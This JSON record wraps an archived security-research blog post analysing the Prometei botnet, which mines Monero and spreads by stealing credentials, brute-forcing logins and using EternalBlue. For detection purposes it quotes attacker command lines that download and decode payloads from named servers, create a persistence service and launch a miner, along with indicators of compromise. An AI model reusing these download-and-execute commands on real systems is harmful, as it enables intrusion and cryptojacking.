{
	"id": "153602d9-2148-4f2d-bfc4-7f6a2a640fef",
	"created_at": "2026-04-06T00:07:26.730322Z",
	"updated_at": "2026-04-10T03:20:18.204331Z",
	"deleted_at": null,
	"sha1_hash": "e2dd49c43c470375806d61d3a60efabcbc58f97e",
	"title": "Prometei botnet and its quest for Monero",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 816743,
	"plain_text": "Prometei botnet and its quest for Monero\r\nBy Vanja Svajcer\r\nPublished: 2020-07-22 · Archived: 2026-04-05 16:57:05 UTC\r\nNEWS SUMMARY\r\nWe are used to ransomware attacks and big-game hunting making the headlines, but there are still methods\r\nadversaries use to monetize their efforts in less intrusive ways.\r\nCisco Talos recently discovered a cryptocurrency-mining botnet attack we're calling \"Prometei\" using\r\nseveral techniques that defenders are likely to spot, but are not immediately obvious to end-users.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1089\r\n(Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086\r\n(PowerShell), T1035 (Service Execution), T1036 (Masquerading) and T1090 (Connection Proxy).\r\nAttackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a\r\ncomplex campaign employing a multi-modular botnet with multiple ways to spread and a payload focused\r\non providing financial benefits for the attacker by mining the Monero online currency. The actor employs\r\nvarious methods to spread across the network, like SMB with stolen credentials, psexec, WMI and SMB\r\nexploits. The adversary also uses several crafted tools that helps the botnet increase the amount of systems\r\nparticipating in its Monero-mining pool.\r\nWhat's new?\r\nWe believe this is the first time that anyone's documented Prometei's operations. The actor is actively maintaining\r\nall the modules and has been active since March this year.\r\nHow did it work?\r\nThe infection starts with the main botnet file which is copied from other infected systems by means of SMB, using\r\npasswords retrieved by a modified Mimikatz module and exploits such as Eternal Blue. The actor is also aware of\r\nthe latest SMB vulnerabilities such as SMBGhost, but no evidence of using this exploit has been found.\r\nThe botnet has more than 15 executable modules that all get downloaded and driven by the main module, which\r\nconstantly communicates with the command and control (C2) server over HTTP. However, the encrypted data is\r\nsent using RC4 encryption, and the module shares the key with the C2 using asymmetric encryption.\r\nApart from a large focus on spreading across the environment, Prometei also tries to recover administrator\r\npasswords. The discovered passwords are sent to the C2 and then reused by other modules that attempt to verify\r\nthe validity of the passwords on other systems using SMB and RDP protocols.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 1 of 22\n\nSo what?\r\nDefenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are\r\nlike water — they will attempt to find the smallest crack to seep in. While organizations need to be focused on\r\nprotecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their\r\ninfrastructure.\r\nTechnical case overview\r\nIntroduction\r\nThis botnet was discovered by investigating telemetry information coming to Talos from Cisco AMP for\r\nEndpoints' install base. We regularly conduct hunting sessions to find new malware that may be running under the\r\nradar. Rules and command lines are one of the best starting points for hunting.\r\nPowerShell drove the first command line we discovered:\r\npowershell.exe \"if(-not (Test-Path 'C:\\windows\\dell\\miwalk.exe')) {$b64=$(New-Object Net.WebClient).DownloadS\r\nFrom then on, we started discovery by traversing the process parent-child graph and coming up to the parent\r\nmodule svchost.exe, which was run from an unusual path in the C:\\Windows, rather than \u003cWindows\\System32\u003e\r\nfolder.\r\nA search through the events for the C:\\windows\\svchost.exe and the downloaded IP address brings us to an even\r\nmore interesting call — broken into individual commands for readability:\r\nC:\\Windows\\System32\\cmd.exe /C taskkill -f -im rdpcIip.exe\r\ndel C:\\windows\\dell\\rdpcIip.exe\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\miwalk.exe')) {$b64=$(New-Object Net.WebClient).DownloadStrin\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\rdpcIip.exe')) {$b64=$(New-Object Net.WebClient).DownloadStri\r\nC:\\Windows\\svchost.exe /sha1chk 58899ed72b617c7e89455d55f5663f44d7eb24d8 C:\\windows\\dell\\miwalk.exe\r\nC:\\Windows\\svchost.exe /sha1chk e5ffb2a8ceb70e7280fb5ac9f8acac389ed0181e C:\\windows\\dell\\rdpcIip.exe\r\nC:\\windows\\dell\\rdpcIip.exe ADMINISTRADOR Cohersa2019\r\nImmediately, we see that svchost has multiple functions. Apart from being the parent process of the PowerShell\r\ninvocation that downloads additional components, it is also executed with the /sha1chk option. This indicates that\r\nit may also contain integrity checking functionality for downloaded modules.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 2 of 22\n\nTwo modules are downloaded and one of them launched rdpcIip,exe — with its file name modified so it looks like\r\nthe legitimate Windows executable rdpclip.exe. Finally, rdpcIip is launched with two arguments that look like they\r\ncould be an administrator's user credentials.\r\nOver a period of more than two months, we followed the activity of this botnet and found more than 15 different\r\nmodules organized in two main functional branches. Both branches can function fairly independently, which may\r\nindicate that we are dealing with another actor piggybacking on the main botnet functionality and using it to\r\nspread their own modules.\r\nThe adversaries developed the first branch in C++ and uses a special type of obfuscation to evade analysis and\r\ndetection in dynamic automated analysis systems. Its main modules — svchost, miwalk, rdpcIip and\r\nSearchIndexer — are clearly made to work together.\r\nTwo main branches of the Prometei (Prometheus) botnet.\r\nHowever, it is more likely we are dealing with the same author, as the second branch is distributed through the\r\nsame download server and it is downloaded by the main bot svchost.exe. However, the second branch deals\r\nmainly with attempting to brute-force the combination of usernames and passwords using SMB and RDP\r\nprotocols and it is developed using .NET framework combined with free tools and modified open-source software.\r\nThe second branch main module nvsync.exe, which communicates with its own C2, contains some indication that\r\nits purpose is cryptocurrency mining, but we have not found evidence of that.\r\nMain botnet module branch\r\nNow, let's look at the main botnet module branch. We'll refer to it as the \"main\" branch because it can function\r\nindependently and conducts Monero cryptocurrency mining. This branch contains modules with the ability to\r\ncommunicate with the C2, spread laterally, steal user credentials and mine Monero. All modules of the main\r\nbotnet branch are compiled as 64-bit applications, although during our hunting, we also found 32-bit variants of\r\nthe main botnet module.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 3 of 22\n\nThe main branch also has auxiliary modules that provide the ability to communicate by proxying communications\r\nover TOR or I2P networks, collecting information about processes running on the system, checks of open ports on\r\ntarget systems and crawling the file systems in search for file names given as the argument to the module,\r\ntypically Bitcoin cryptocurrency wallets.\r\nMain botnet module — Svchost.exe\r\nAlthough the main module is installed in the Windows folder as svchost.exe, it is spread laterally with the module\r\nnames \"xsvc.exe\" and \"zsvc.exe\" and are downloaded for updating with PowerShell as up.exe.\r\nMain botnet installation and persistence\r\nAll bot versions are packed with UPX, likely to decrease its size. However, even early versions have another layer\r\nof obfuscation, which seems to be a simple XOR obfuscator that decrypts the rest of the code in memory and\r\njumps to the original entry point.\r\nEarlier bot entry-point code with a simple obfuscator.\r\nHowever, later versions of the bot employed a different packer which depends on the existence of an external file\r\nto be properly unpacked. We have found this packer applied to the main bot module and the modified Mimikatz\r\nexecutable miwalk.exe to obtain user credentials from system memory. Svchost.exe, the main bot, checks for the\r\nexistence of the file \"C:\\Windows\\mscordata.dll.\"\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 4 of 22\n\nCustom packer applied to the main bot and Mimikatz modules.\r\nIn addition to making manual analysis more difficult, this anti-analysis technique also avoids detection in dynamic\r\nautomated analysis systems, such as Cisco Threat Grid. When the execution begins, after UPX unpacking, the\r\nexecution may take two paths. The first one creates a text file \"c:\\windows\\temp\\setup_gitlog.txt\" containing the\r\ntext \"PaiAuganMai Diag Utility - Setup\" and then pings Google's DNS server 8.8.8.8 followed by the sysinfo.exe\r\ncommand to save the output of both commands to the file c:\\Windows\\Temp\\sysinfo.txt.\r\nWe found multiple samples that executed this functionality. The detection rate based on this behavior is relatively\r\nlow.\r\nHowever, if the external file exists, it will open and read a single byte, eventually decrypting the main botnet code.\r\nCpuid instruction is also used during the decryption. Initially, this indicated that an anti-VM technique may have\r\nbeen used to avoid execution of the bot in the virtual environment. However, this is not the case, and the\r\ninstruction is only used to retrieve some flags that are used in the decryption process.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 5 of 22\n\nThe bot reads a single byte from a file and uses the byte to control execution flow.\r\nSince only a single byte is used, we only have 255 values for the initialization of one of the decryption variables\r\n(in 64-bit code it is register r14d) and several strategies on how to approach unpacking, but the easiest way is to\r\nbrute-force the register content. We can do this with an external script or by automating the debugger, which is\r\nwhat we used. We created a simple x64dbg script that allowed us to get to the required value after a few minutes.\r\n$j=0\r\nstart:\r\ninitdbg \"c:\\windows\\zsvc.exe\" //initialize the debugger with the file to be analysed\r\ncmp $pid,0 //successful initialization?\r\nje start\r\nbp 141092418 // set breakpoint to main and continue\r\nerun // we hit the entry point\r\nerun // we hit the main function\r\nbp 14108f441 //if this breakpoint is hit then success!!\r\nbp 14108f0f9 //if this breakpoint is hit set r14d to the counter $j and increment the counter\r\nbp 14108f331 //we failed go back to the beginning\r\nerun //continue\r\ncmp rip, 14108f0f9 //time to initialise r14d?\r\njne checkfail //if not have we failed and reached decoy code?\r\nr14d=$j\r\nlog {d:r14d} //log the current counter value\r\n$j = $j + 1\r\ncmp $j,255\r\nje end\r\nerun\r\ncheckfail:\r\ncmp rip, 14108f331 //are we in the decoy code, if yes restart debugging\r\njne checksuccess\r\ngoto start\r\nchecksuccess:\r\ncmp rip,14108f441 //Success!!! We found the value we need. End.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 6 of 22\n\njne start\r\nend:\r\npause\r\nX64dbg script for unpacking the main bot code.\r\nFinally, after some time spent debugging and deobfuscating, we have reached the main bot's deobfuscated C++\r\ncode and from then on, it is not difficult to find the main function.\r\nIt starts with an attempt to create the folder c:\\windows\\dell and proceeds to attempt to start the service\r\nUPlugPlay. If the service is successfully started, the bot exists. Otherwise, it assumes it has to install itself and set\r\nthe persistence mechanism.\r\nThe zsvc.exe copies itself into c:\\Windows\\svchost.exe and sets up a service UPlugPlay, which is also visible from\r\nthe command-line logs. Once the service is set up, it starts and connects to the C2 server.\r\ncmd.exe /C sc create UPlugPlay binPath= C:\\Windows\\svchost.exe Dcomsvc type=own DisplayName=UPlug-and-Play Host\r\nCreation of UPlugPlay service as seen in the command-line log.\r\nThe communication with the C2 server is conducted over HTTP and is visible, although the commands and results\r\nof the commands are transferred using RC4 encryption with a key generated on the client computer and stored in\r\nthe registry values HKLM\\SOFTWARE\\Microsoft\\Fax\\MachineKeyId and\r\nHKLM\\SOFTWARE\\Microsoft\\Fax\\Encrypted\\MachineKeyId.\r\nThe RC4 key is shared over HTTP as a base64-encoded string in the enckey variable using asymmetric encryption\r\nusing the C2 public key stored in the bot's data section.\r\nhttp://bk1.bitspiritfun2[.]net/cgi-bin/prometei.cgi?add=b64encodedmachineinfo\u0026h=SERVIDOR\u0026i=1Z2NJQOUX1A3A8CD\u0026enc\r\nAn example of initial addition of a server to the botnet and its encryption key.\r\nThe HTTP form variable \"add\" contains base64-encoded information about the victim machine, including its\r\ndomain name, model and processor type. For example:\r\ninfo {\r\n machine name\r\n domain.local\r\n 2x Intel(R) Xeon(R) CPU 3040 @ 1.86GHz\r\n 4Gb\r\n HP\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 7 of 22\n\nML110 G4\r\n ProLiant ML110 G4\r\n 10.0.14393\r\n Serial number\r\n 20/07/2007\r\n}\r\nMachine information info block added to C2 botnet database.\r\nOnce the host is recruited to the botnet, the main bot enters an infinite loop polling commands from the command\r\nand control server. As it is quite common with remote access trojans and bots, there are handlers for usual\r\ncommands that allow the attacker to control the infected system.\r\nThe bot expects one of the following commands:\r\nrun — Execute a program/file using ShellExecute API\r\nexec — Execute a program using CreateProcess API\r\nsrun — Check if the path exists, calculate its SHA1 and execute using CreateProcess\r\ncmdt — Launch a command shell, redirect stdin and stdout to pipes over HTTP\r\ncmd — Launch a command shell, redirect stdin and stdout to pipes over HTTP\r\nscmd — Execute a single command\r\nver — Get the bot's version\r\nextip — Get the bot's external IP address\r\nenc — Get/set the RC4 encryption key\r\nupdatev3 — Download updated bot to svchost2.exe and start the process then remove the file. If that is not\r\nsuccessful terminate the process first.\r\nset_timeout — Set period for connecting to C2 server\r\nset_cc — Set new C2 server\r\ntouch — Open file and write a single byte to change checksums and access times\r\nwget — Download file\r\nxwget — Download file, save it, then open it and XOR it using single byte XOR with initial key 0x42 and\r\naddition of 0x42 for each byte\r\nstop_mining — Terminate the mining process by calling cmd.exe /C taskkill -f -im SearchIndexer.exe. If\r\nthat did not work, try launching a thread that will call taskkill.\r\nstart_mining1 — Read C:\\windows\\dell\\Desktop.dat to get parameters and launch SearchIndexer.exe\r\nstart_mining — Request desktop.txt from the C2, save it to Desktop.dat and launch the miner with\r\nparameters read from Desktop.dat\r\nquit — Terminate the bot using TerminateProcess\r\nquit2 — Exit the command handler loop without calling TerminateProcess\r\ngetinfo — Get information about the infected system using WMI WQL queries and other methods\r\nCommunication with the C2 server is conducted either directly over HTTP, TOR or I2P proxies. In our\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 8 of 22\n\nanalysis, we only managed to find the c:\\windows\\dell\\msdtc.exe file whose main purpose is to proxy\r\nrequests over TOR to the C2 server https://gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi. Another module\r\nc:\\windows\\dell\\msdtc2.exe may exist which allows the bot to route its requests over an I2P network.\r\nThe main botnet module can function alone as a remote access trojan, but the main purpose of this actor is to mine\r\nMonero coins and possibly to steal bitcoin wallets potentially protected by passwords stolen with Mimikatz.\r\nOther modules are available and can be downloaded by the main bot module. The downloads are the initial\r\nactivity we detected in our telemetry.\r\nDuring our research, we found two main C2 servers: bk1.bitspiritfun2[.]net and p1.feefreepool[.]net. The first one\r\nwas active until June 8 when the IP address of the server changed to 75.2.37[.]224, owned by Amazon. The\r\nresponse from the server, \"403 Forbidden,\" may indicate successful takeover of the botnet. The previous two\r\naddresses were located in Germany and France.\r\nDNS query activity for bk1.bitspiritfun2.net as seen by Cisco Umbrella\r\nThe second server is hosted in Germany on an IP address 88.198.246[.]242 owned by Hetzner.\r\nDNS query activity for p1.feefreepool.net as seen by Cisco Umbrella.\r\nThe requests for C2 servers come for a fairly wide range of countries, with most requests coming from systems in\r\nthe United States, Brazil, Turkey, Pakistan, China, Mexico and Chile.\r\nThe downloading server 103.11.244[.]221 is hosted in Hong Kong, while 208.66.132[.]3, 69.28.95[.]50 and\r\n69.84.240[.]57 is in the U.S.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 9 of 22\n\nSpreader (rdpcl1p.exe) and password stealer (miwalk.exe)\r\nThe second most notable module allows the bot to spread laterally over SMB. RdpcIip.exe is coupled with\r\nmiwalk.exe. The wmain function starts with checking is the credentials file c:\\windows\\dell\\ssldata2.dll exists as\r\nwell as c:\\windows\\dell\\ssldata2_old.dll, which is used to store older credentials.\r\nThe spreader module then changes the registry value:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential\r\nto 1 so the credentials are stored in memory and retrieved using techniques employed by the password-stealer\r\nmodule.\r\nThe spreader then launches miwalk.exe, a modified version of Mimikatz that steals credentials and stores them in\r\nssldata2.dll. If the credentials are successfully stolen, the spreader will parse the credentials file and retrieve the\r\nIPv4 address mapping table to extract the IP addresses of the local network interfaces where the local networks are\r\nextracted and saved to the file c:\\windows\\dell\\net.txt.\r\nThe spreader iterates over a network saved in net_\u003cip_address_of_the_interface\u003e.txt and attempts to spread to\r\nsystems within the networks. This is repeated for every interface. The spreader attempts to establish and\r\nauthenticate an SMB session using stolen credentials or the guest account without a password and copy the main\r\nbot module as xsvc.exe or zsvc.exe to the target system.\r\nIf the main bot module is successfully copied, the spreader will either use psexec or WMI to remotely launch the\r\ncopied module.\r\nIf the attempt with stolen credentials are not successful, the spreader will attempt to launch a variant of the Eternal\r\nBlue exploit, depending on the remote operating system version, and send the shellcode to install and launch the\r\nmain bot module.\r\nMonero mining payload (XMRig)\r\nThe final payload of the main functional branch is a sample of the open source Monero mining software XMRig\r\nversion 5.5.3. The miner is located in the folder c:\\windows\\dell with the name SearchIndexer.exe. The XMRig\r\npayload is downloaded by the main bot module.\r\nC:\\Windows\\System32\\cmd.exe /C powershell.exe\r\nif(-not (Test-Path 'C:\\windows\\dell\\Desktop.dat')) {\r\n(New-Object Net.WebClient).DownloadFile('http://208.66.132[.]3:8080/Desktop.txt', 'C:\\Windows\\dell\\Desktop.dat')\r\n}\r\nif(-not (Test-Path 'C:\\windows\\dell\\WinRing0x64.sys')) {\r\n$b64 = $(New-Object Net.WebClient).DownloadString('http://208.66.132[.]3:8080/dllr0.php');\r\n$data = [System.Convert]::FromBase64String($b64);\r\n$bt = New-Object Byte[]($data.Length);\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 10 of 22\n\nFOR ([int]$ i = 0; $i -lt $data.Length; $i++){\r\n $bt[$i] = ((($data[$i]+0xFE) -band 0xFF) -bXOR 255);\r\n }\r\n[io.file]::WriteAllBytes('C:\\windows\\dell\\WinRing0x64.sys',$bt);\r\n}\r\nif(-not (Test-Path 'C:\\windows\\dell\\SearchIndexer.exe')) {\r\n$b64=$(New-Object Net.WebClient).DownloadString('http://208.66.132[.]3:8080/srchindx2.php');\r\n$data=[System.Convert]::FromBase64String($b64);\r\n$bt=New-Object Byte[]($data.Length);\r\n[int]$j=0;\r\n FOR([int]$i=0;$i -lt $data.Length; $i++){\r\n $j+=66;$bt[$i]=(((($data[$i]) -bXOR (($i*3) -band 0xFF))-$j) -band 0xFF);\r\n }\r\n[io.file]::WriteAllBytes('C:\\windows\\dell\\SearchIndexer.exe',$bt);\r\n}\r\ntaskkill -f -im taskmgr.exe\r\nC:\\Windows\\svchost.exe /sha1chk fcd80a03388f0f73a8718d18291590b77ac10dd2 C:\\windows\\dell\\SearchIndexer.exe\r\nThe command line to download and check the integrity of XMRig miner as visible in the log.\r\nThe miner is first packed with UPX and then with a relatively simple XOR packer that adds a new PE section —\r\n.ucode — to the executable. This is similar to the packer in earlier versions of the main bot module.\r\nThe miner is called by the main bot module svchost.exe when the C2 issues the command start_mining. Svchost\r\ngets the command-line parameters such as the mining server, the miner username, password and the protocol used\r\nfor mining from the C2. The launch of the miner is visible in the command-line log of the infected systems.\r\nC:\\windows\\dell\\SearchIndexer.exe -o stratum+tcp://srv1.feefreepool[.]net:80 -u 4A1txQ9L8h8NqF4EtGsZDP5vRN3yTVK\r\nIf we search for this particular account on Monerohash.com, we get to the result that shows this botnet\r\nconsistently achieving between 700KH/sec and 950KH/sec, which implies the amount of infected systems is in\r\nthe low thousands. The earning potential of the botnet is relatively small and during its four-month run, it earned\r\nits owner just under $5,000 USD, or $1,250 per month, on average.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 11 of 22\n\nEarnings of the Monero mining botnet on July 8, 2020.\r\nThis is consistent with the indications of the Monero mining calculator available on Cryptocompare.com.\r\nMonero crypto mining calculator which shows the earning potential of the botnet.\r\nAlthough earnings of $1,250 per month doesn't sound like a significant amount compared to some other cyber\r\ncriminal operations, for a single developer in Eastern Europe, this provides more than the average monthly salary\r\nfor many countries.\r\nPerhaps that is why, if we look at the embedded paths to program database files in many botnet components, we\r\nsee a reference to the folder c:\\Work.\r\nC:\\Work\\Tools_2019\\misc\\tor_hidden_svc\\darkread\\x64\\Release\\darkread.pdb\r\nC:\\Work\\Tools_2019\\prometei\\RDPBrute2016.NET\\RDPDetect\\bin\\Release\\CryptoObfuscator_Output\\nvsync.pdb\r\nC:\\Work\\Tools_2019\\prometei\\nvstub\\Release\\nvstub.pdb\r\nC:\\Work\\Tools_2019\\prometei\\psbrute\\Release\\psbrute.pdb\r\nC:\\Work\\Tools_2019\\walker\\netwalker\\x64\\Release\\rdpcIip.pdb\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 12 of 22\n\nC:\\Work\\Tools_2019\\misc\\util\\chk445\\Release\\chk445.pdb\r\nC:\\Work\\Tools_2019\\misc\\util\\crawler\\Release\\crawler.pdb\r\nOther auxiliary modules\r\nApart from the main four modules, the botnet also contains 7multiple auxiliary modules that get downloaded and\r\nrun on a command from the C2 server.\r\nCrawler.exe is a simple file system crawler which searches the local file system for filenames specified as the\r\nparameter. We have observed low activity of the module and its usage indicates the intention of the actor to find\r\nBitcoin wallets on infected systems.\r\nChk445.exe is a simple tool that checks if port 445 is opened on the targeted system. Ztasklist.exe is a tool that\r\nenumerates all the running processes and\r\nModules smcard.exe and msdtc.exe are tasked with communicating with C2 servers over TOR. Smcard.exe is the\r\nTOR relay that connects the infected system to the TOR network and starts a socks proxy on localhost port 9050.\r\nMsdtc.exe is a proxy client which is driven by the main bot module. Its command line parameter is simply\r\nBase64-encoded URL and the request to the gb7ni5rgeexdcncj.onion C2 server and this request will be routed\r\nthrough the TOR network.\r\nNvstub branch\r\nThe second botnet branch, which we're calling \"Nvstub,\" has its own functionality and a different C2.\r\nSvchost first attempts to delete several files and then download executables required to download a 7-Zip archive\r\nthat contains all components of the Nvstub branch. The 7-Zip archive is extracted by a previously downloaded\r\n7z.exe utility. The Nvstub archive, _agent.7z, is password-protected with the password \"horhor123\". Once the\r\nagent is extracted in C:\\Windows\\dell folder, the main botnet module launches nvstub.exe, the first module of the\r\nsecond branch, with the single command line parameter that contains the IP address of the C2 and its password.\r\nC:\\Windows\\System32\\cmd.exe /C taskkill -f -im SearchIndexer.exe\r\ndel C:\\Windows\\dell\\_agent.7z\r\ntaskkill -f -im nvsync.exe\r\ndel C:\\windows\\dell\\nvsync.exe\r\ndel C:\\windows\\dell\\ps.exe\r\ntaskkill -f -im socks.exe\r\ndel C:\\windows\\dell\\socks.exe\r\ndel C:\\windows\\dell\\nvsync2.exe\r\ndel C:\\windows\\dell\\nvsync4.exe\r\ndel C:\\windows\\dell\\winpr2.dll\r\ndel C:\\windows\\dell\\freerdp2.dll\r\ndel C:\\windows\\dell\\freerdp-client2.dll\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 13 of 22\n\ndel C:\\windows\\dell\\nvstub.exe\r\ndel C:\\Windows\\dell\\_agent.7z\r\npowershell.exe if(-not (Test-Path 'C:\\windows\\dell\\7z.dll')) {(New-Object Net.WebClient).DownloadFile('http://20\r\nC:\\Windows\\svchost.exe /sha1chk 48bcecd5d3f293cdc8356aee5ec4bab3252493fb C:\\windows\\dell\\7z.exe\r\nC:\\Windows\\svchost.exe /sha1chk 98a5ee5d689d664a14bb9a680c6e4fec5e752842 C:\\windows\\dell\\7z.dll\r\nC:\\Windows\\svchost.exe /sha1chk c42ab26ad284d52aefa2d40b7f4bf9a95109a5ff C:\\windows\\dell\\_agent.7z\r\nC:\\windows\\dell\\7z x C:\\Windows\\dell\\_agent.7z -phorhor123 -oC:\\Windows\\dell -y\r\ndel C:\\Windows\\dell\\_agent.7z\r\ndel C:\\windows\\dell\\SearchIndexer.exe\r\nC:\\Windows\\dell\\nvstub.exe 211.23.16[.]239/prometheus.php_x1\r\nInstallation and launch of the Nvstub branch as seen from the command line log.\r\nNvstub.exe is a simple module that sets up the environment for other modules — the most significant being the\r\nsecond bot, nvsync.exe. The _agent.7z archive contains the nvsync2.exe and nvsync4.exe variants of the bot.\r\nNvstub.exe first checks the version of .NET framework installed on the system, attempts to terminate three main\r\nbranch modules — nvsync.exe, ps.exe and socks.exe — and, finally, copies the appropriate version of nvsync into\r\nnvsync.exe and launches it with the arguments forwarded from its own arguments.\r\nNvstub is the first module that sets the environment for other modules.\r\nNvsync\r\nWhile most of the other botnet modules as written in C or C++, here, the actor displays the shift in the\r\nprogramming environment and chooses the .NET framework and C# for the main bot module of the Nvstub\r\nbranch. The actor applies obfuscation to the module using CryptoObfuscator protector, but that is easily addressed\r\nusing de4dot.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 14 of 22\n\nPart of the deobfuscated nvsync.exe code with renamed functions to describe functionality.\r\nWhen started, the nvsync.exe module will parse its command line arguments and either initialize the bot and\r\nconnect with the C2 or create an array of processes — the number of which depends on the computing power of\r\nthe infected system. Each process will launch another instance of nvsync.exe which will, based on its parameters,\r\ncheck the validity of credentials for a list of IP addresses supplied by the C2 server using either SMB or RDP\r\nclients.\r\nWe observed only one C2 URL for the Nvstub branch: https://211.23.16[.]239/prometheus.php, hosted in Taiwan.\r\nThe parameters for child processes are first encrypted with RC4 and then encoded using Base64. The RC4\r\npassphrase \"param error user,\" used for encrypting parameters for child processes is decrypted from a hardcoded\r\nBase64 encoded string \"T9FLs3QS45JuVnTAljDz4Q==\" and the initial passphrase \"Data param error.\"\r\nFrom then on, this encryption is likely used to evade suspicious invocation of the child processes that contain IP\r\naddresses, domain names, usernames and passwords.\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 15 of 22\n\nRC4 decryption of a password parameter using a CyberChefinstance.\r\nApart from the main nvsync.exe module, there are two additional important modules that are integral for the\r\ncorrect function of the botnet: ps.exe and socks.exe. They are both 32-bit applications.\r\nBefore calling any of the credential's validation modules, nvsync.exe filters credentials to avoid certain targets.\r\nThese include:\r\n…\r\nIME_ADMIN\r\nIME_USER\r\nPlesk Administrator\r\nSvcCOPSSH\r\nWDeployAdmin\r\nGuest\r\nГость\r\nftpuser\r\nFTP User\r\nAltro utente\r\nOther User\r\nДругой пользователь  \r\nThe validation will also not be attempted if the supplied credentials contain one of the following strings:\r\nworkgroup\r\nmshome\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 16 of 22\n\nwin\r\nmicrosoft\r\nuser\r\nadmin\r\nadministrator\r\npc\r\ncom\r\nbuh\r\nlocal\r\nhome\r\ncorp\r\noffice\r\nlan\r\nbiz\r\nnet\r\norg\r\nloc\r\nru\r\nua\r\ntr\r\nserver\r\nserv\r\nsrv\r\nPs.exe\r\nThe first module attempts to log onto TCP port 445 using the NTLM authentication protocol. Every successful\r\nconnection confirms the validity of credentials for the target IP address and the credentials are confirmed with C2\r\nserver by nvsync.exe module.\r\nPacket capture showing attempts to connect and validate supplied credentials.\r\nThere are some similarities in the code of ps.exe and rdpcIip.exe, mostly around low-level SMB communication\r\nand authentication with the NTLM Security Support Provider.\r\nSocks.exe\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 17 of 22\n\nSocks.exe RDP communication capabilities depend on the open-source and free RDP client libraries freerdp2.dll\r\nand freerdp-client.dll. The application first processes the parameters, which include the IP address and the port of\r\nthe host, as well as the main part of the filename, without the extension, containing credentials to be attempted for\r\nlogging into the target system. The supplied name of the file is generated by base64-encoding the RC4-encrypted\r\ncombination of the ip_address:port of the target.\r\nSocks.exe parses a file with the extension \".cpass\" containing candidate passwords and attempts to log into an\r\nRDP server using the combination of the domain supplied as a command-line argument and administrator's\r\nusername. Each successful combination of credentials will be saved in the file name with the same base name and\r\nthe extension .cpass_good.\r\nOnce socks.exe terminates and returns to nvsync.exe, nvsync reads all validated credentials and submits them to\r\nthe command and control server.\r\nAuxiliary modules for the Nvstub branch\r\nThe second branch auxiliary modules are all legitimate executables or libraries that support the operation of the\r\nbranch. 7z.exe is the 7-Zip unarchiver used to extract files from the _agent.7z archive that contains all modules of\r\nthe Nvstub branch. Zlib.dll is a 7z.exe dependency. Two of the FreeRDP DLLs — freerdp2.dll and freerdp-client2.dll — are required for successful RDP communications but can also be found as a part of a legitimate\r\nFreeRDP installation.\r\nConclusion\r\nDespite their activities being visible in logs, some botnets successfully fly under detection teams' radar, possibly\r\ndue to their small size or constant development on the adversary's part. Prometei is just one of these types of\r\nnetworks that focuses on Monero mining. It has been successful in keeping its computing power constant over the\r\nthree months we've been tracking it.\r\nThe botnet was active as early as the beginning of March, but it seems to have been dealt a blow by a takeover of\r\none of its C2 servers on June 8. But this takeover didn't stop its mining capabilities or the validation of stolen\r\ncredentials. The botnet continues to make a moderate profit for a single developer, most likely based in Eastern\r\nEurope.\r\nThe actor behind it is also likely its developer. The TTPs indicate we may be dealing with a professional\r\ndeveloper, based on their ability to integrate SMB exploits such as Eternal Blue and authentication code and the\r\nuse of existing open-source projects, such as Mimikatz and FreeRDP.\r\nApart from stealing computing power, the botnets behaviour of stealing and validating credentials is worrying.\r\nAlthough we only saw evidence of stolen credentials being used to spread laterally, they also have a value on\r\nunderground markets and the damage potential of losing important administrative username and password is very\r\nhigh. This is why organizations that detect the presence of Prometei botnet on their system should act immediately\r\nto remove it and to make sure none of their credentials are leaked to the command and control server.\r\nCoverage\r\nhttps://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html\r\nPage 18 of 22\n\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS),Cisco ISR, andMeraki MX can detect 